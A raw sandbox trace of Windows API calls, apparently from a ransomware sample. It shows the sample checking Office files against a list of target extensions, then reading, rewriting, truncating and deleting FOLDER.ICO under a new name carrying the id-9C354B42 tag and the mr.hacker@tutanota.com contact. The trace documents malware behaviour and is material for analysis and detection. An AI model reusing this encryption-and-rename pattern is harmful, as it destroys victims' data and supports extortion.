[0272.221] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.221] lstrlenW (lpString=".zip") returned 4 [0272.221] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.221] lstrlenW (lpString=".rar") returned 4 [0272.221] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.221] lstrlenW (lpString=".bz2") returned 4 [0272.221] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.221] lstrlenW (lpString=".7z") returned 3 [0272.221] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.221] lstrlenW (lpString=".dbf") returned 4 [0272.221] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.221] lstrlenW (lpString=".1cd") returned 4 [0272.221] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.221] lstrlenW (lpString=".jpg") returned 4 [0272.221] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.221] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.221] lstrlenW (lpString="CLVWINTL.DLL") returned 12 [0272.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.222] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=19880) returned 1 [0272.222] CloseHandle (hObject=0x3ac) returned 1 [0272.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll")) returned 0x20 [0272.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.222] lstrlenW (lpString=".doc") returned 4 [0272.222] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString=".docx") returned 5 [0272.222] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.222] lstrlenW (lpString=".pdf") returned 4 [0272.222] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString=".xls") returned 4 [0272.222] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString=".xlsx") returned 5 [0272.222] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.222] lstrlenW (lpString=".ppt") returned 4 [0272.222] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.222] lstrlenW (lpString=".zip") returned 4 [0272.222] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString=".rar") returned 4 [0272.222] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.222] lstrlenW (lpString=".bz2") returned 4 [0272.223] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.223] lstrlenW (lpString=".7z") returned 3 [0272.223] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString=".dbf") returned 4 [0272.223] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString=".1cd") returned 4 [0272.223] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString=".jpg") returned 4 [0272.223] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString=".doc") returned 4 [0272.223] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString=".docx") returned 5 [0272.223] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.223] lstrlenW (lpString=".pdf") returned 4 [0272.223] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString=".xls") returned 4 [0272.223] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString=".xlsx") returned 5 [0272.223] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.223] lstrlenW (lpString=".ppt") returned 4 [0272.223] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.223] lstrlenW (lpString=".zip") returned 4 [0272.223] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString=".rar") returned 4 [0272.223] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.223] lstrlenW (lpString=".bz2") returned 4 [0272.224] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.224] lstrlenW (lpString=".7z") returned 3 [0272.224] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.224] lstrlenW (lpString=".dbf") returned 4 [0272.224] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.224] lstrlenW (lpString=".1cd") returned 4 [0272.224] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60 [0272.224] lstrlenW (lpString=".jpg") returned 4 [0272.224] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.224] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.224] lstrlenW (lpString="CMAXRES.DLL") returned 11 [0272.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.225] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=35216) returned 1 [0272.226] CloseHandle (hObject=0x3ac) returned 1 [0272.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll")) returned 0x20 [0272.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.226] lstrlenW (lpString=".doc") returned 4 [0272.226] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString=".docx") returned 5 [0272.226] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.226] lstrlenW (lpString=".pdf") returned 4 [0272.226] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString=".xls") returned 4 [0272.226] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString=".xlsx") returned 5 [0272.226] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.226] lstrlenW (lpString=".ppt") returned 4 [0272.226] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.226] lstrlenW (lpString=".zip") returned 4 [0272.226] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString=".rar") returned 4 [0272.226] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.226] lstrlenW (lpString=".bz2") returned 4 [0272.226] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.227] lstrlenW (lpString=".7z") returned 3 [0272.227] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString=".dbf") returned 4 [0272.227] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString=".1cd") returned 4 [0272.227] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString=".jpg") returned 4 [0272.227] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString=".doc") returned 4 [0272.227] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString=".docx") returned 5 [0272.227] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.227] lstrlenW (lpString=".pdf") returned 4 [0272.227] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString=".xls") returned 4 [0272.227] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString=".xlsx") returned 5 [0272.227] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.227] lstrlenW (lpString=".ppt") returned 4 [0272.227] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.227] lstrlenW (lpString=".zip") returned 4 [0272.227] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString=".rar") returned 4 [0272.227] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.227] lstrlenW (lpString=".bz2") returned 4 [0272.228] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.228] lstrlenW (lpString=".7z") returned 3 [0272.228] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.228] lstrlenW (lpString=".dbf") returned 4 [0272.228] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.228] lstrlenW (lpString=".1cd") returned 4 [0272.228] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59 [0272.228] lstrlenW (lpString=".jpg") returned 4 [0272.228] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.228] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0272.228] lstrlenW (lpString="ContactPickerIntl.dll") returned 21 [0272.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.228] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=16256) returned 1 [0272.228] CloseHandle (hObject=0x3ac) returned 1 [0272.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll")) returned 0x20 [0272.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.229] lstrlenW (lpString=".doc") returned 4 [0272.229] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString=".docx") returned 5 [0272.229] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0272.229] lstrlenW (lpString=".pdf") returned 4 [0272.229] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString=".xls") returned 4 [0272.229] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString=".xlsx") returned 5 [0272.229] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0272.229] lstrlenW (lpString=".ppt") returned 4 [0272.229] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.229] lstrlenW (lpString=".zip") returned 4 [0272.229] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString=".rar") returned 4 [0272.229] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.229] lstrlenW (lpString=".bz2") returned 4 [0272.229] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.229] lstrlenW (lpString=".7z") returned 3 [0272.229] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.229] lstrlenW (lpString=".dbf") returned 4 [0272.230] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString=".1cd") returned 4 [0272.230] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString=".jpg") returned 4 [0272.230] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString=".doc") returned 4 [0272.230] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString=".docx") returned 5 [0272.230] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0272.230] lstrlenW (lpString=".pdf") returned 4 [0272.230] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString=".xls") returned 4 [0272.230] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString=".xlsx") returned 5 [0272.230] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0272.230] lstrlenW (lpString=".ppt") returned 4 [0272.230] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString=".zip") returned 4 [0272.230] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString=".rar") returned 4 [0272.230] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.230] lstrlenW (lpString=".bz2") returned 4 [0272.230] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.230] lstrlenW (lpString=".7z") returned 3 [0272.230] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.230] lstrlenW (lpString=".dbf") returned 4 [0272.231] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.231] lstrlenW (lpString=".1cd") returned 4 [0272.231] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69 [0272.231] lstrlenW (lpString=".jpg") returned 4 [0272.231] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.231] lstrcmpiW (lpString1=".ICO", lpString2=".USA") returned -1 [0272.231] lstrlenW (lpString="FOLDER.ICO") returned 10 [0272.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.233] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=4710) returned 1 [0272.233] CloseHandle (hObject=0x3ac) returned 1 [0272.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico")) returned 0x20 [0272.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.233] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.233] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.350] GetLastError () returned 0x0 [0272.350] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1266, lpOverlapped=0x0) returned 1 [0272.352] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1270, lpOverlapped=0x0) returned 1 [0272.353] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.353] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.353] SetEndOfFile (hFile=0x3b4) returned 1 [0272.353] CloseHandle (hObject=0x3b4) returned 1 [0272.353] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.353] SetEndOfFile (hFile=0x3ac) returned 1 [0272.355] CloseHandle (hObject=0x3ac) returned 1 [0272.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.358] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico")) returned 1 [0272.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.402] lstrlenW (lpString=".doc") returned 4 [0272.402] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1 [0272.402] lstrlenW (lpString=".docx") returned 5 [0272.402] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1 [0272.402] lstrlenW (lpString=".pdf") returned 4 [0272.402] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1 [0272.402] lstrlenW (lpString=".xls") returned 4 [0272.402] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1 [0272.402] lstrlenW (lpString=".xlsx") returned 5 [0272.402] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1 [0272.402] lstrlenW (lpString=".ppt") returned 4 [0272.402] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1 [0272.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.402] lstrlenW (lpString=".zip") returned 4 [0272.402] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1 [0272.402] lstrlenW (lpString=".rar") returned 4 [0272.402] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1 [0272.402] lstrlenW (lpString=".bz2") returned 4 [0272.402] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1 [0272.402] lstrlenW (lpString=".7z") returned 3 [0272.402] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1 [0272.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.402] lstrlenW (lpString=".dbf") returned 4 [0272.402] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1 [0272.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.402] lstrlenW (lpString=".1cd") returned 4 [0272.403] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.403] lstrlenW (lpString=".jpg") returned 4 [0272.403] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.403] lstrlenW (lpString=".doc") returned 4 [0272.403] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1 [0272.403] lstrlenW (lpString=".docx") returned 5 [0272.403] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1 [0272.403] lstrlenW (lpString=".pdf") returned 4 [0272.403] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString=".xls") returned 4 [0272.403] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString=".xlsx") returned 5 [0272.403] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1 [0272.403] lstrlenW (lpString=".ppt") returned 4 [0272.403] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71 [0272.403] lstrlenW (lpString=".zip") returned 4 [0272.403] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString=".rar") returned 4 [0272.403] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1 [0272.403] lstrlenW (lpString=".bz2") returned 4 [0272.403] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1 